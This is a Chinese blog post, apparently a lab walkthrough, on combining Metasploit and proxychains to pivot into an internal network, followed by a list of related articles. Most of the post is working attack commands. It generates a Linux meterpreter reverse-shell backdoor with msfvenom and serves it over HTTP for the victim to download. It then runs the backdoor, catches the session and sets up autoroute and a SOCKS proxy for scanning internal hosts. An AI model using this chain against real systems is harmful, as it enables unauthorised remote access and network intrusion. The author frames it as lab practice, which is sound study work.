内网渗透中proxtychains和msf的配合使用

已于 2024-07-04 17:41:13 修改
阅读量286 收藏 3
点赞数 7
分类专栏: 漏洞复现 文章标签: 网络安全 测试工具
于 2024-06-18 19:26:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45630387/article/details/139768937
版权

以下步骤msf6以上版本metasploit适用。
实验靶场环境,真实攻击肯定不是这么操作。

获取一个meterpreter

受害者主机为linux主机

  1. 生成木马文件
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.58.228.19 LPORT=4444 -f elf > linux_backdoor

  1. 将木马文件上传到受害者主机
    在攻击机上开一个简易web服务:

    python3 -m http.server 8888

    受害者机器远程下载攻击机器上的文件

    wget http://10.58.228.19:8888/linux_backdoor

  2. msf监听并连接
    使用msfconsole命令启动metasploit,然后依次执行以下命令

    use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost  10.58.228.19
set lport 4444
run

    在受害者主机执行木马文件

    chmod 777 linux_backdoor
./linux_backdoor

此时再看攻击机器已经成功获取到meterpreter,执行background回到msf主控制面板

配置代理

给metasploit的操作设置代理路由(使用proxtychains其实可以不管这个)

msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute 
#查看并确定使用哪个session
msf6 post(multi/manage/autoroute) > sessions 
msf6 post(multi/manage/autoroute) > set session 1
msf6 post(multi/manage/autoroute) > run

开启一个代理转发端口(这个需要配置)

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvhost 10.58.228.19
msf6 auxiliary(server/socks_proxy) > set version 4a
set session 1

更改 proxychains 配置

vim /etc/proxychains4.conf
#######
#在该文件中添加一行:
socks4 10.58.228.19 1080

使用攻击机扫描内网环境

只用-sT和-Pn都扫不出结果,只能-sT -Pn,原因不明。
但我猜肯定有个原因是proxychains好像只对tcp流量生效,nmap默认会先ping(icmp)一下确认主机存活,所以没有-Pn使nmap不进行icmp存活判断的话,nmap上来就认定this host is down直接就跳过了。

proxychains4 nmap -sT -Pn -sV 10.244.0.79
逛淘宝入睡仙人
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
双网卡 sql server 服务器_msf+proxychains代理内部服务器所有流量
weixin_42474537的博客
01-08 576
proxychains代理内部服务器所有流量0x01 TD;LR在渗透测试的过程,通过msf拿到了立足点之后,可开始对内网的其他机器进行测试,但内网机器无法连接互联网,可通过设置socks4a代理将内部的流量代理出来,让外部机器可以直接访问内部的机器。工具proxychainsmsfpc0x02 实验环境注意:FILESERVER为内部服务器,WEBSERVER为外部服务器,双网卡,可...
内网渗透测试 MSF搭建socks代理
m0_63028223的博客
10-14 2686
通过msf设置代理渗透内网不出网主机
kali内置超好用的代理工具proxychains
最新发布
Eason_LYC安全白帽子的成长博客
03-21 9881
Kali Linux是一个流行的安全测试和渗透测试操作系统,而ProxyChains是其一个非常有用的工具,它可以帮助用户在渗透测试期间隐藏其真实IP地址,以便更好地保护他们的匿名性和隐私。具体来说,ProxyChains是一个开源工具,它允许用户通过一个或多个代理服务器来路由TCP或UDP连接,从而隐藏其真实IP地址。该工具可以用于在不被发现的情况下执行各种网络操作,例如扫描和攻击,而无需揭示用户的位置和身份。
路由代理(msf、CobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2544
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
[内网基础]msf使用&内网实战演示
_DESpiSED的博客
11-14 1168
本文结合msfconsole和相关工具进行内网渗透实战演示,希望给大家一些思路。
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
msf内网渗透
10-29
在IT安全领域,尤其是渗透测试和网络攻防,“msf内网渗透”是一个关键话题,涉及到了Metasploit框架(简称MSF)在内部网络的应用与实践。这一过程通常包括了渗透测试前的环境准备、利用MSF生成有效载荷、设置web...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
内网渗透讲解与实验手册
05-16
- **基本信息:** 使用msf生成payload将msf用于内网渗透。 - **路径:** WinWeb服务器(192.168.20.162)。 - **使用工具:** msf。 **实验过程:** 1. **生成payload:** - 使用msfpayload生成Windows可执行exe...
浅谈MSF渗透测试
02-24
在渗透过程MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架...下面小白总结了一下在渗透测试使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
MSF开启socks代理内网渗透
The current road is different, love needs to distinguish between right and wrong
04-25 6047
简介 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。 测试环境 kali: 192.168.95.128 windows7: 192.168.95.169 ; 192.168.70.3 server2012: 192.168.70.2
Metasploit 结合 proxychains 使用
你干啥呢
04-16 1万+
如果运行   proxychains /usr/local/share/metasploit-framework/msfconsole metasploit会报错: [-] Failed to connect to the database: could not connect to server: Connection refused         Is the serve
proxychains
blogfeifei
08-22 323
上一篇是要借助外部的工具来实现内网代理,并且有很大的局限性,如果远程主机没开ssh或者做了防火墙规则给过滤掉一般的IP,就不能再用了 这里我们讲一下通过反向代理和本地proxychains来实现内网代理功能,对目标内网进行入侵渗透。不说废话,看图文…… 蛋疼了,不发图了,直接写文字, 大的环境作一下介绍,目标主机是内网不可上网的NN台服务器,各种环境,各种操作系统都有,入口鸡是可以上网的服务...
cs和msf实现内网横向移动3
wuxinweii的博客
11-02 1601
注:上传通过哈希攻击拿到172.16.1.123的权限,也就是说成功跳转到172.16这个网段,这次通过172.16.1.123拿到172.16.1.119的权限 一、通过172.16.1.123确定172.16.1.119为域控 因为是靶机,所以知道了172.16.1.119为域控 二、通过proxychain代理流量进内网 因为vps无法直接访问到172.16.1.119,所以可以通过172.16.1.123生成一个代理端口来代理流量进入这个网段 1.下载proxychain 参考文章:https://
通过SOCKS代理渗透整个内网
午夜安全
10-17 1万+
通过SOCKS代理渗透整个内网 1.背景 经过前期的渗透工作,我们现在已经成功找到了web站点的漏洞,并且获得了一个普通的webshell,现在准备用菜刀去连接它。 注意:本次环境在本地搭建,假设现在一无所知,这样更加真实。 2.对web服务器提权 2.1获取漏洞信息 获取到webshell后使用菜刀连接,查看权限是apache,系统是redhat6.5。 上传linux.sh到...
socks5搭建_[内网渗透]MSF配合proxychains搭建socks5代理
weixin_39887577的博客
12-08 3126
使用MSF搭建socks5代理首先获得一个 meterpreter shell,然后使用 auxiliary/server/socks_proxy 模块搭建代理meterpreter > run autoroute -s 192.168.77.1/24 # 获取路由meterpreter > backgroundmsf5 > use auxiliary/server/...
proxychains4配置使用
热门推荐
weixin_30470643的博客
09-25 2万+
一丶安装  sudo apt-get install proxychains4  二丶修改配置文件 sudo vim /etc/proxychains.conf 在文本最后加上你的代理服务器地址,如果有用户名和密码也加上。 #各配置项用法如下:#dynamic_chain:#每个连接都将通过链接代理完成#所有代理按列表显示的顺序链接#至...
内网渗透-做代理流量转发-msf跨网段攻击(添加路由表)-Windowsew和proxifier做代理-kaliew和proxychains4做代理
没有
05-17 2281
0x01代理-windowsew和proxifier 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s sscoked -l 8000 2.在windows启用proxifier,添加服务器,输入靶机上的ip和端口 3.设置代理规则 第一步截图: 第二步截图: 第三步截图: 你可以使用代理了 0x02代理-kaliew和proxychains4做代理 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值